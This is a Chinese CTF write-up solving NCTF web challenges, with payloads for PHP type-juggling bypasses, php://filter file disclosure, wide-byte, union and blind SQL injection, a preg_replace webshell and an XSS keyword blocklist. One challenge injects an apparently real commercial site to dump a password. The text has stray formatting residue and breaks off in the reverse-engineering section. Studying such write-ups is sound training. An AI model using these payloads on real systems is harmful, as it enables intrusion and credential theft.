NCTF 南京邮电大学网络攻防训练平台 WriteUp
NCTF 南京邮电大学网络攻防训练平台 WriteUp
不说什么直接上题解
WEB
1.签到题(50)
直接查看网页源码
Flag:nctf{flag_admiaanaaaaaaaaaaa}
2.md5 collision(50)
源码如下:
<?php
$md51 = md5("QNKCDZO");
$a = @$_GET["a"];
$md52 = @md5($a);
if(isset($a)){
if ($a != "QNKCDZO" && $md51 == $md52) {
echo "nctf{*****************}";
} else {
echo "false!!!";
}}
else{echo "please input a";}
?>
重点在这里
if ($a != "QNKCDZO" && $md51 == $md52) {
echo "nctf{*****************}";
1.$a不等于"QNKCDZO" 但$a的MD5等于"QNKCDZO"的MD5
这想想也是不可能的事,此中必有蹊跷
2.观察发现md5("QNKCDZO")="0e830400451993494058024219903391"
3.在php中==号为弱比较"0e"开头剩下的全为数字不管数字是多少==恒成立
因为"0e***"==0
所以下一步的目的很明显制造开头为 ‘0e’ 的MD5字符串
字符串生成
这里将$a=s878926199a
得到flag:nctf{md5_collision_is_easy}
3.签到2(50)
网页源码如下:
<html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
尚未登录或口令错误<form action="./index.php" method="post">
<p>输入框:<input type="password" value="" name="text1" maxlength="10"><br>
请输入口令:zhimakaimen
<input type="submit" value="开门">
</form>
</html>
重点在这
<p>输入框:<input type="password" value="" name="text1" maxlength="10"><br>
请输入口令:zhimakaimen
输入的口令长度为11,而他html源码限制的长度为10
处理方法有两种:
- 利用浏览器自带插件,我这里用的是Firefox的hackbar插件,直接越过HTML代码直接进行post传递
- 利用burpsuit工具直接在http头上稍作修改,只需将text1赋值为zhimakaimen即可
上述两种方法都能直接得到flag
flag:nctf{follow_me_to_exploit}
4.这题不是WEB(100)
打开之后有个猫的图片
将猫图片下载至桌面
用txt打开此文档
发现如下:
最后为flag:nctf{photo_can_also_hid3_msg}
5.层层递进(100)
最讨厌脑洞题,拿着题不知道如何下手最后看了writeup才知道访问的URL:http://chinalover.sinaapp.com/web3/404.html
进去之后查看源码发现了如下代码:
<!--
<script src="./js/jquery-n.7.2.min.js"></script>
<script src="./js/jquery-c.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-{.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-h.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-a.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-l.7.2.min.js"></script>
<script src="./js/jquery-4.7.2.min.js"></script>
<script src="./js/jquery-g.7.2.min.js"></script>
<script src="./js/jquery-}.7.2.min.js"></script>
-->
这段代码一眼就看出flag的举手 handsup
flag:nctf{this_is_a_fl4g}
6.AAencode(100)
tips:javascript aaencode
aaencode是js加密的一种特别好玩,可以吧文字加密成表情
除了aaencode之外还有几种特别的加密方式
- Perl的ppencode
- Ruby的rrencode
编码连接如下:http://www.cnblogs.com/android-html5/archive/2011/02/09/2533784.html
AAencode 可以直接在chrome浏览器 的控制台console直接运行:
运行方式如图:
这里有console的好玩用法:http://www.cnblogs.com/Wayou/p/chrome-console-tips-and-tricks.html
总之console在这了可以执行js AAencode加密过的代码:
得到flag:nctf{javascript_aaencode}
7.单身二十年(100)
题目上说看手速,其实一开始用浏览器查看网络流发现如下:
看见了没!!!有个源文件 search_key.php!!!
接下来就是截获这个源文件了。。。。。
直接上burpsuit截获。上图
key is : nctf{yougotit_script_now}
8.你从哪里来(100)
are you from google?
一看就知道我要伪造从http://www.google.com/ 那里来
这里有篇博客写的就是http header的字段
这里面有个referer字段:HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器藉此可以获得一些信息用于处理。
我们另Referer:https://www.google.com/
再burpsuit直接改就行
如下图:
拿到flag:nctf{http_referer}
9.php decode(100)
直接让解码,看看代码吧
<?php
function CLsI($ZzvSWE) {
$ZzvSWE = gzinflate(base64_decode($ZzvSWE));
for ($i = 0; $i < strlen($ZzvSWE); $i++) {
$ZzvSWE[$i] = chr(ord($ZzvSWE[$i]) - 1);
}
return $ZzvSWE;
}eval(CLsI("+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA=="));?>
eval 是个神奇的函数关于eval的链接在这
eval可以执行php代码所以我直接让他执行并输出修改代码如下:
echo CLsI("+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA==");
放在php里直接运行,得出结果
flag:nctf{gzip_base64_hhhhhh}
10.文件包含(150)
这道题非常棒!!!让我学到了一个新的漏洞
文件包含漏洞,先了解一下php://filter
php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。
同时我也借此机会学到了文件读取的相关知识。
- include “test.php”php文件包含,在执行流中插入写在其他文件中的有用的代码。读取的时候也是数据流形式,因此可以使用php://filter进行过滤,返回值为0,1。
- readfile(“test.php”)是将文件以数据流的形式读取过来,并不会执行,但会在前台浏览器上进行解析。返回值是字节数多少。
file_get_contents(“test.php”)返回值为文本内容
此题运用的就是关于数据流过滤的文件包含,我们一般在进行文件包含的时候都这么写include “test.php”获得的就是test.php直接解析出来。但如果运用readfile(“test.php”) 就不进行解析,导致无法在浏览器前台进行显示。那么问题来了看题
它让我点击它 我一下子就点了他!!!
出来了个这个URL
http://4.chinalover.sinaapp.com/web7/index.php?file=show.php
一看呵呵哒,典型的文件包含漏洞我们可以通过构造含有漏洞的语句,查看想要看的代码
file=php://filter/read=convert.base64-encode/resource=index.php
这里有个关于漏洞的详解
简单的重复一下他的意思
注解:
1.php://filter/可用于处理打开的数据流,起到过滤作用。如果源文件为.php则很有可能在前台显示不出来。
2.此时我们采用的方法是,先让文件转化为base64格式(convert.base64-encode)然后再输出,这样不论是什么格式的文件都可以在前台输出。
3.再次解码就可得到源代码,怎么样是不是很神奇啊!
看图片:
看见了base64编码!!
python解码就行啦,看图
flag:nctf{edulcni_elif_lacol_si_siht}
11 .单身一百年也没用(150)
上去直接查看请求头:
flag就在眼前nctf{this_is_302_redirect}
最简单的一道题
12 .Download~!(200)
查看页面源码:
<p><a href="download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=" target="_blank">星星点灯</a></p>
<p><a href="download.php?url=YnV4aWFuZ3poYW5nZGEubXAz" target="_blank">不想长大</a></p>
发现了下载文件的URL
download.php?url=base64("文件名")
这里我没想到下载download.php。不过想想也是,这也没有其他文件了吧除了这个。果断转码base64("download.php")=ZG93bmxvYWQucGhw
URL=https://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw
下载得到download.php代码,如下:
<?php
error_reporting(0);
include("hereiskey.php");
$url=base64_decode($_GET[url]);
if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){
$file_size = filesize($url);
header ( "Pragma: public" );
header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
header ( "Cache-Control: private", false );
header ( "Content-Transfer-Encoding: binary" );
header ( "Content-Type:audio/mpeg MP3");
header ( "Content-Length: " . $file_size);
header ( "Content-Disposition: attachment; filename=".$url);
echo(file_get_contents($url));
exit;
}
else {
echo "Access Forbidden!";
}
?>
又发现了一个文件hereiskey.php,估计flag就在里面,果断下载
URL:way.nuptzj.cn/web6/download.php?url=aGVyZWlza2V5LnBocA==
得到flag代码:
?<?php
//flag:nctf{download_any_file_666}
?>
flag:nctf{download_any_file_666}
13 .COOKIE(200)
TIP:
0==not
tip很有用哒,0==not,脑补1==yes
看样子要修改cookie了,看http报头
OK目的很明确
修改cookie
有两种方法:
利用chrome自带的cookie工具
利用burpsuit直接修改
flag:nctf{cookie_is_different_from_session}
14.MYSQL(200)
一上来就给我们科普:robots.txt
这里有百科
看我robots.txt的代码
<?php
if($_GET[id]) {
mysql_connect(SAE_MYSQL_HOST_M . ":" . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$id = intval($_GET[id]);
$query = @mysql_fetch_array(mysql_query("select content from ctf2 where id="$id""));
if ($_GET[id]==1024) {
echo "<p>no! try again</p>";
}
else{
echo($query[content]);
}
}
?>
if ($_GET[id]==1024) {
echo "<p>no! try again</p>";
}//说明id!=1024
$id = intval($_GET[id]);//这是前面的代码 转为整数
随手输了个id=1024.1
过了
flag is:nctf{query_in_mysql}
15.sql injection 3(200)
终于开始了sql注入,等了好久~~~
看题!!!
当我让id=2时,呵呵哒出来了
title:gbk_sql_injection
gbk宽字节注入的题目,这里有链接解释宽字节注入
还有一个
题目中输入id=’ 则会显示成id=’”很显然’被自动转义了。
这是我们输入id=%df’ or 1=1#
很显然成功了 ,没了
发现news数据库里面并没有flag~~~
盲打莽撞,发现了个flag数据库(不要问我是怎么知道的,猜的) 直接上union查询
URL:index.php?id=%df%27union select *,1 from flag%23
直接爆出flag
再多说一句当输入index.php?id=%df%27union select * from flag%23 时
ErrorThe used SELECT statements have a different number of columns
说明字段不同加个字段试试,index.php?id=%df%27union select *,1 from flag%23
总结:
union查询原则
- 前后的字段数量必须相同
- 查询出来的字段全是第一个数据表中的字段
- 第一个数据库有结果集则第二个查询的结果集接在第一个结果集的后面
- 如果第一个查询没有结果集,则显示的全是第二个查询的结果集
才出来: flag:nctf{gbk_3sqli}
16./x00(200)
这题是一道好题!!!
直接就有源码:
view-source:
if (isset ($_GET["nctf"])) {
if (@ereg ("^[1-9]+$", $_GET["nctf"]) === FALSE)
echo "必须输入数字才行";
else if (strpos ($_GET["nctf"], "#biubiubiu") !== FALSE)
die("Flag: ".$flag);
else
echo "骚年,继续努力吧啊~";
}
ereg详解
strops详解
这里ereg有两个漏洞
- %00截断及遇到%00则默认为字符串的结束
- 当ntf为数组时它的返回值不是FALSE
所以有两个方法去攻这道题目
1.令id=1%00%23biubiubiu
2.令nctf为数组则,nctf[]=111
附加:
- === 格式也等
- !== (0!==false 为true)
最后附上这道题目的答案
flag:nctf{use_00_to_jieduan}
17.bypass again(200)
依旧是弱类型
看来又是弱类型的php漏洞
if (isset($_GET["a"]) and isset($_GET["b"])) {
if ($_GET["a"] != $_GET["b"])
if (md5($_GET["a"]) === md5($_GET["b"]))
die("Flag: ".$flag);
else
print "Wrong.";
}
$_GET可以接受数组但MD5
md5()不能处理数组结构的数据
利用此漏洞构造index.php?a[]=1&b[]=2
Flag: nctf{php_is_so_cool}
18.变量覆盖(200)
直接见代码:
<?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
<?php
extract($_POST);
if ($pass == $thepassword_123) { ?>
<div class="alert alert-success">
<code><?php echo $theflag; ?></code>
</div>
<?php } ?>
<?php } ?>
这里有extract的详解
总的来说是extract() 函数从数组中将变量导入到当前的符号表。
典型的变量覆盖
if ($pass == $thepassword_123) { ?>
只需要覆盖$pass、$thepassword_123这两个变量使他们相等即可
flag:nctf{bian_liang_fu_gai!}
19.PHP是世界上最好的语言(250)
看源码
<?php
if(eregi("hackerDJ",$_GET[id])) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
echo "<p>Access granted!</p>";
echo "<p>flag: *****************} </p>";
}
?>
观察一下发现有两个判断条件
if(eregi("hackerDJ",$_GET[id]))//id与hackerDJ不相同
$_GET[id] = urldecode($_GET[id]);//id又经历了一次URL解码
if($_GET[id] == "hackerDJ")//解码后的id与hackerDJ相同
这下子好办了两次URL加密即可 ,只加密前一个字符
其实url编码就是一个字符ascii码的十六进制。
h的URL编码为%68,在进行一次编码后为%2568
则令id=%2568ackerDJ
url :http://way.nuptzj.cn/php/index.php?id=%2568ackerDJ
flag: nctf{php_is_best_language}
20.伪装者(250)
这题是固定的模式,直接伪造http头有两种方法:
- Firefox modify headers 插件
直接burpsuit截断添加 x-forwarded-for:127.0.0.1
nctf{happy_http_headers}
21.Header(250)
这题好low
直接看报头
flag就在其中
nctf{tips_often_hide_here}
22.上传绕过(250)
我首先上传了一个1.jpg文件
然后报的提示是这样的
必须是php文件才行啊!
然后就上传1.php文件
然后报的提示是这样的
只允许上传 jpg,GIF ,png后缀的文件
这才意识到我要上传.jpg的文件让他识别为.php的文件,怎么才能做到呢???
看她的第一个错误提示它是怎么识别文件后缀的
它是根据./uploads目录下的basename进行识别的
在我们上传的时候会出现./uploads
尝试着在/uploads/下加个0X00字符截断 先这么写/uploads/1.php
然后 filename=”1.jpg”
报错如下:
basename为1.php 1.jpg
OK
下一步就在这里加一个截断/uploads/1.php0x00
方法如下:
- 用burpsuit 截断
在/uploads/后面加上1.php (这里是空格好标识) - 然后打开hex编码寻找空格及20
- 找到之后将其修改为00 按回车确认
此时变为
然后直接提交
flag:nctf{welcome_to_hacks_world}
23.SQL注入1(300)
直接看源码
<?php
if($_POST[user] && $_POST[pass]) {
mysql_connect(SAE_MYSQL_HOST_M . ":" . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$user = trim($_POST[user]);
$pass = md5(trim($_POST[pass]));
$sql="select user from ctf where (user="".$user."") and (pw="".$pass."")";
echo "</br>".$sql;
$query = mysql_fetch_array(mysql_query($sql));
if($query[user]=="admin") {
echo "<p>Logged in! flag:******************** </p>";
}
if($query[user] != "admin") {
echo("<p>You are not admin!</p>");
}
}
echo $query[user];
?>
这里有trim的详解
这里起到过滤字符串两端空格的作用
这道题 ***** 一个字坑
看见括号了没,我一直没看见··········
最简单的注入 和password无关
user=admin ‘)# //注意括号要闭合不然报错 我就是被坑的
提交
flag:nctf{ni_ye_hui_sql?}
24.pass check(300)
直接看核心代码
还有tip:strcmp(array,string)=null=0
<?php
$pass=@$_POST["pass"];
$pass1=***********;//被隐藏起来的密码
if(isset($pass))
{
if(@!strcmp($pass,$pass1)){
echo "flag:nctf{*}";
}else{
echo "the pass is wrong!";
}
}else{
echo "please input pass!";
}
?>
tip一出这题就没有难度了
直接传pass个数组形式pass[]=1
look
flag:nctf{strcmp_is_n0t_3afe}
25.起名字真难(300)
代码如下:
<?php
function noother_says_correct($number)
{
$one = ord("1");
$nine = ord("9");
for ($i = 0; $i < strlen($number); $i++)
{
$digit = ord($number{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
return false;
}
}
return $number == "54975581388";
}
$flag="*******";
if(noother_says_correct($_GET["key"]))
echo $flag;
else
echo "access denied";
?>
分析一下代码要让number == ‘54975581388’,并且number每个字符与’54975581388’都不同,这就没辙了 。
想想啊 让两个数相等换个进制呗
只能换十六进制了
if ( ($digit >= $one) && ($digit <= $nine) )//因为这段代码的限制
54975581388==0xccccccccc
所以URL:http://chinalover.sinaapp.com/web12/index.php?key=0xccccccccc
The flag is:nctf{follow_your_dream}
26.密码重置(300)
首先看URL:http://nctf.nuptzj.cn/web13/index.php?user1=Y3RmdXNlcg%3D%3D
user1是什么鬼,我用base64解密之后 哈哈 原来是ctfuser
直接上图吧不多说什么了
27.php 反序列化(300)
代码:
<?php
class just4fun {
var $enter;
var $secret;
}
if (isset($_GET["pass"])) {
$pass = $_GET["pass"];
if(get_magic_quotes_gpc()){
$pass=stripslashes($pass);
}
$o = unserialize($pass);
if ($o) {
$o->secret = "*";
if ($o->secret === $o->enter)
echo "Congratulation! Here is my secret: ".$o->secret;
else
echo "Oh no... You can"t fool me";
}
else echo "are you trolling?";
}
?>
这里有序列化反序列化的科普
总的来说让输一个·序列化过后的字符串并且类中的变量始终保持相同,这一下子就想到了引用 a=&b
($o->secret === $o->enter)
我构造如下代码制造序列化字符串:
<?php
class just4fun {
var $enter;
var $secret;
function just4fun()
{
$this->enter=&$this->secret;
}
}
echo serialize(new just4fun());
?>
OK flag 出来啦
flag: nctf{serialize_and_unserialize}
28.sql injection 4(300)
直接看代码:
<!--
#GOAL: login as admin,then get the flag;
error_reporting(0);
require "db.inc.php";
function clean($str){
if(get_magic_quotes_gpc()){
$str=stripslashes($str);
}
return htmlentities($str, ENT_QUOTES);
}
$username = @clean((string)$_GET["username"]);
$password = @clean((string)$_GET["password"]);
$query="SELECT * FROM users WHERE name="".$username."" AND pass="".$password."";";
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
die("Invalid password!");
}
echo $flag;
-->
科普htmlentities($str, ENT_QUOTES)
这是一个单引号过滤。我们就没有办法添加单引号闭合了,看来只能运用转义字符吃掉单引号了。怎么吃掉的呢??
- 我在本地搭了一个环境
现在的mysql查询语句变成了SELECT * FROM users WHERE name=’’ AND pass=’ or 1=1 #’;
tip:在mysql查询语句中转义字符不参与闭合 也就是说第二个单引号不参与闭合 第一个单引号和第三个单引号闭合此时
name=’’ AND pass=’
然后是下面的 or 1=1
结果一下就出来了
flag:nctf{sql_injection_is_interesting}
29.综合题(300)
tip:bash
打开一看这是什么啊jother编码
chrome console解码得:
1bc29b36f623ba82aaf6724fd3b16718.php
直接打开文件
看tip:history of bash
上网搜了一下history of bash
/.bash_history 文件
于是打开文件
出现zip -r flagbak.zip ./*
输上URL:http://teamxlc.sinaapp.com/web3/b0b0ad119f425408fc3d45253137d33d/flagbak.zip
自动下载了flagbak.zip
解压里面就有flag
flag is:nctf{bash_history_means_what}
30.SQL注入2(400)
tip: 注入第二题~~主要考察union查询
<?php
if($_POST[user] && $_POST[pass]) {
mysql_connect(SAE_MYSQL_HOST_M . ":" . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$user = $_POST[user];
$pass = md5($_POST[pass]);
$query = @mysql_fetch_array(mysql_query("select pw from ctf where user="$user""));
if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
echo "<p>Logged in! Key: ntcf{**************} </p>";
}
else {
echo("<p>Log in failure!</p>");
}
}
?>
仔细看看代码
$query = @mysql_fetch_array(mysql_query("select pw from ctf where user="$user""));
if (($query[pw]) && (!strcasecmp($pass, $query[pw])))
观察发现只要让结果集中有你输入密码的MD5值就行嘿嘿
这样就OK啦
flag: ntcf{union_select_is_wtf}
31.综合题2(400)
终于把这题给搞懂了,还看了别人的题解
1. 第一步
点击本cms说明
出来一堆文件,发现file后面可接文件名,并将文件荡出来,于是写了python脚本,开始荡文件
http://cms.nuptzj.cn/about.php?file=sm.txt
# -*- coding: utf-8 -*-
import requests
import HTMLParser
import codecs
s=["say","config","passencode","index","so","antiinject","antixss"]
h = HTMLParser.HTMLParser()
for i in s:
url="http://cms.nuptzj.cn/about.php?file={0}.php".format(i);
f=codecs.open(str(i)+".php","w+","utf-8")#codecs可指定文件编码
s=requests.get(url)
s.encoding="utf-8"
f.write(h.unescape(s.text))#反转意html实体
下面看看文件
so.php
<?php
if($_SERVER["HTTP_USER_AGENT"]!="Xlcteam Browser"){
echo "万恶滴黑阔,本功能只有用本公司开发的浏览器才可以用喔~";
exit();
}
$id=$_POST["soid"];
include "config.php";
include "antiinject.php";
include "antixss.php";
$id=antiinject($id);
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error());
mysql_select_db($db_name,$con);
$id=mysql_real_escape_string($id);
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
$rs=mysql_fetch_array($result);
echo htmlspecialchars($rs["nice"]).":<br /> ".antixss($rs["say"])."<br />";
mysql_free_result($result);
mysql_free_result($file);
mysql_close($con);
?>
say.php
<?php
include "config.php";
$nice=$_POST["nice"];
$say=$_POST["usersay"];
if(!isset($_COOKIE["username"])){
setcookie("username",$nice);
setcookie("userpass","");
}
$username=$_COOKIE["username"];
$userpass=$_COOKIE["userpass"];
if($nice=="" || $say==""){
echo "<script>alert("昵称或留言内容不能为空!(如果有内容也弹出此框,不是网站问题喔~ 好吧,给个提示:查看页面源码有惊喜!)");</script>";
exit();
}
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error());
mysql_select_db($db_name,$con);
$nice=mysql_real_escape_string($nice);
$username=mysql_real_escape_string($username);
$userpass=mysql_real_escape_string($userpass);
$result=mysql_query("SELECT username FROM admin where username="$nice"",$con);
$login=mysql_query("SELECT * FROM admin where username="$username" AND userpass="$userpass"",$con);
if(mysql_num_rows($result)>0 && mysql_num_rows($login)<=0){
echo "<script>alert("昵称已被使用,请更换!");</script>";
mysql_free_result($login);
mysql_free_result($result);
mysql_close($con);
exit();
}
mysql_free_result($login);
mysql_free_result($result);
$say=mysql_real_escape_string($say);
mysql_query("insert into message (nice,say,display) values("$nice","$say",0)",$con);
mysql_close($con);
echo "<script>alert("构建和谐社会,留言需要经过管理员审核才可以显示!");window.location = "./index.php"</script>";
?>
passencode.php
<?php
function passencode($content){
//$pass=urlencode($content);
$array=str_split($content);
$pass="";
for($i=0;$i<count($array);$i++){
if($pass!=""){
$pass=$pass." ".(string)ord($array[$i]);
}else{
$pass=(string)ord($array[$i]);
}
}
return $pass;
}
?>
antixss.php
<?php
function antixss($content){
preg_match("/(.*)[a](.*)[/a](.*)/",$content,$url);
$key=array("(",")","&","\","<",">",""","%28","%29"," on","data","src","eval","unescape","innerHTML","document","appendChild","createElement","write","String","setTimeout","cookie");//因为太菜,很懒,所以。。。(过滤规则来自Mramydnei)
$re=$url[2];
if(count($url)==0){
return htmlspecialchars($content);
}else{
for($i=0;$i<=count($key);$i++){
$re=str_replace($key[$i], "_",$re);
}
return htmlspecialchars($url[1],ENT_QUOTES)."<a href="".$re."">".$re."</a>".htmlspecialchars($url[3],ENT_QUOTES);
}
}
?>
antiinject.php
<?php
function antiinject($content){
$keyword=array("select","union","and","from"," ",""",";",""","char","or","count","master","name","pass","admin","+","-","order","=");
$info=strtolower($content);
for($i=0;$i<=count($keyword);$i++){
$info=str_replace($keyword[$i], "",$info);
}
return $info;
}
?>
about.php
<?php
$file=$_GET["file"];
if($file=="" || strstr($file,"config.php")){
echo "file参数不能为空!";
exit();
}else{
$cut=strchr($file,"loginxlcteam");
if($cut==false){
$data=file_get_contents($file);
$date=htmlspecialchars($data);
echo $date;
}else{
echo "<script>alert("敏感目录,禁止查看!但是。。。")</script>";
}
}
2.注入
id搜索后出现so.php,存在注入点soid。数据表名为admin 字段名username userpass
开始注入,利用burpsuit先报username的内容
file=1/*/aandnd/*/exists(selselectect/*/usernamnamee/*/frfromom/*/admadminin/*/limit 1,1)
判断出username字段长度为5,userpass字段长度为6
利用脚本爆内容
import requests
url=r"http://cms.nuptzj.cn/so.php"
header={
"User-Agent": "Xlcteam Browser",
}
dic="0123456789abcdefghijklmnopqrstuvwxyz"
string=""
for i in range(1,6):
for j in dic:
id="1/**/anandd/**/exists(selselectect/**/*/**/frfromom/**/admadminin/**/where/**/oorrd(substr(usernamnamee,{0},1))>{1})".format(str(i),str(ord(j)))#只需将username更改为uerpass
data={
"soid":id
}
s=requests.post(url=url,headers=header,data=data)
content=s.text
print 1
if(len(content)<430):
string+=j
break
print string
结果为admin 1020117099010701140117011001160117
后面的加密算法在passencode.php里面解密为fuckruntu
有了账号密码就可以登后台了在about.php里有loginxlcteam
http://cms.nuptzj.cn/loginxlcteam/
登录
- 一句话木马
xlcteam.php
<?php
$e = $_REQUEST["www"];
$arr = array($_POST["wtf"] => "|.*|e",);
array_walk($arr, $e, "");
?>
典型的一句话木马
上网搜索
令www=preg_replace&wtf=print_r(scandir(‘.’))
出flag
32.注入实战1(500)
我超喜欢这道题说真的我学到了好多呢
看题
1. 第一步
首先利用order by 爆出字段数
order by 1000 时报错了
http://www.backstagecommerce.ca/services.php?id=1 order by 1000
然后用二分法爆出他的字段数为19
2. 第二步
利用联合查询 爆出显示字段
http://www.backstagecommerce.ca/services.php?id=-1%20union%20select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
这里的id=-1这是为什么呢,因为啊id如果不为-1 结果集里第一条就是该查询到的结果,而后面的select 内容并不会显示出来,所以这里要赋给没有的id,负值都可以。
这里爆出了3,6,7,8,9,10,11,12,13 这么多的显示字段,下一步我们用哪个字段都行来爆他的数据表
报表语句
http://www.backstagecommerce.ca/services.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,(select group_concat(table_name) from information_schema.tables where table_schema=database()),12,13,14,15,16,17,18,19#
主要是这句话
(select group_concat(table_name) from information_schema.tables where table_schema=database())
把这句话放到显示字段位置上即可
group_concat这里不多做解释,意思是多个字段查询的结果合并后在一行显示
information_schema.tables里面有数据库中的所有表
database()指的是当前数据库
table_schema指的是所有数据库
table_name 是属于information_schema.tables的表 相当于其中的一个元素
如果不懂自己动手查吧
爆出来的表名如下
有木有看见user数据表我们只关心这个,下一步要爆字段了
3. 第三步
这一步我们要爆字段
有了数据表字段还不好爆吗
http://www.backstagecommerce.ca/services.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,(select group_concat(column_name) from information_schema.columns where table_name="users"),13,14,15,16,17,18,19#
information_schema.columns 该数据库中的所有字段
table_name 表的名字
column_name 属于information_schema.columns中的元素
看看都爆出来了什么字段
看见没password字段 我们想要的东西在里面 下一步把值给爆出来吧!!!
4. 第四步
这一步 我们要爆他的密码
http://www.backstagecommerce.ca/services.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,(select password from users),13,14,15,16,17,18,19#
也可以这样
http://www.backstagecommerce.ca/services.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,(password),13,14,15,16,17,18,19 from users#
密码就在上图BSCmarketing24
然后再md5加密成 f3d6cc916d0739d853e50bc92911dddb
flag: nctf{f3d6cc916d0739d853e50bc92911dddb}
33.密码重置2(500)
TIPS:
1.管理员邮箱观察一下就可以找到
2.linux下一般使用vi编辑器,并且异常退出会留下备份文件
3.弱类型bypass
根据源码发现了邮箱
admin@nuptzj.cn
tip2:上网搜了vi编辑器异常退出留下备份文件名
直接打开.submit.php.swp文件如下
源码如下
........这一行是省略的代码........
/*
如果登录邮箱地址不是管理员则 die()
数据库结构
--
-- 表的结构 `user`
--
CREATE TABLE IF NOT EXISTS `user` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`username` varchar(255) NOT NULL,
`email` varchar(255) NOT NULL,
`token` int(255) NOT NULL DEFAULT "0",
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;
--
-- 转存表中的数据 `user`
--
INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES
(1, "****不可见***", "***不可见***", 0);
*/
........这一行是省略的代码........
if(!empty($token)&&!empty($emailAddress)){
if(strlen($token)!=10) die("fail");
if($token!="0") die("fail");
$sql = "SELECT count(*) as num from `user` where token="$token" AND email="$emailAddress"";
$r = mysql_query($sql) or die("db error");
$r = mysql_fetch_assoc($r);
$r = $r["num"];
if($r>0){
echo $flag;
}else{
echo "失败了呀";
}
}
```23
***重点在这***
<div class="se-preview-section-delimiter"></div>
if(strlen(
长度为十并且值为零
只有$token=0000000000
“`
将邮箱admin@nuptzj.cn
密码0000000000
得到flag
flag:nctf{thanks_to_cumt_bxs}
总的来说收获不小,特别是在写writeup的时候,因为写的比较细所以基本上问题都解决了,付出和收获成正比!!!仅供大家参考如果有更好的方法也希望互相交流!!!祝大家玩得愉快!!!
if(strlen($token)!=10) die("fail");
if($token!="0") die("fail");
长度为十并且值为零
只有$token=0000000000
将邮箱admin@nuptzj.cn
密码0000000000
得到flag
flag:nctf{thanks_to_cumt_bxs}
REVERSE
1.Hello.RE
用OD直接找strcmp
2.READasm
00000000004004e6 <func>:
4004e6: 55 push rbp
4004e7: 48 89 e5 mov rbp,rsp
4004ea: 48 89 7d e8 mov QWORD PTR [rbp-0x18],rdi ;input[]
4004ee: 89 75 e4 mov DWORD PTR [rbp-0x1c],esi ;28
4004f1: c7 45 fc 01 00 00 00 mov DWORD PTR [rbp-0x4],0x1 ;i = 1
4004f8: eb 28 jmp 400522 <func+0x3c> ;for(i;i<=28;i++)
4004fa: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
4004fd: 48 63 d0 movsxd rdx,eax ;i
400500: 48 8b 45 e8 mov rax,QWORD PTR [rbp-0x18]
400504: 48 01 d0 add rax,rdx ;rax = i + string[0]
400507: 8b 55 fc mov edx,DWORD PTR [rbp-0x4] ;edx = i
40050a: 48 63 ca movsxd rcx,edx ;rcx = i
40050d: 48 8b 55 e8 mov rdx,QWORD PTR [rbp-0x18] ;rdx = string
400511: 48 01 ca add rdx,rcx ;rdx = i + string[0]
400514: 0f b6 0a movzx ecx,BYTE PTR [rdx] ;ecx = chr(i+string[0])
400517: 8b 55 fc mov edx,DWORD PTR [rbp-0x4] ;edx = i
40051a: 31 ca xor edx,ecx
40051c: 88 10 mov BYTE PTR [rax],dl
40051e: 83 45 fc 01 add DWORD PTR [rbp-0x4],0x1
400522: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
400525: 3b 45 e4 cmp eax,DWORD PTR [rbp-0x1c]
400528: 7e d0 jle 4004fa <func+0x14>
40052a: 90 nop
40052b: 5d pop rbp
40052c: c3 ret
直接写exploit
#coding=utf8
input = [ 0x67, 0x6e, 0x62, 0x63, 0x7e, 0x74, 0x62, 0x69, 0x6d,
0x55, 0x6a, 0x7f, 0x60, 0x51, 0x66, 0x63, 0x4e, 0x66, 0x7b,
0x71, 0x4a, 0x74, 0x76, 0x6b, 0x70, 0x79, 0x66 , 0x1c];
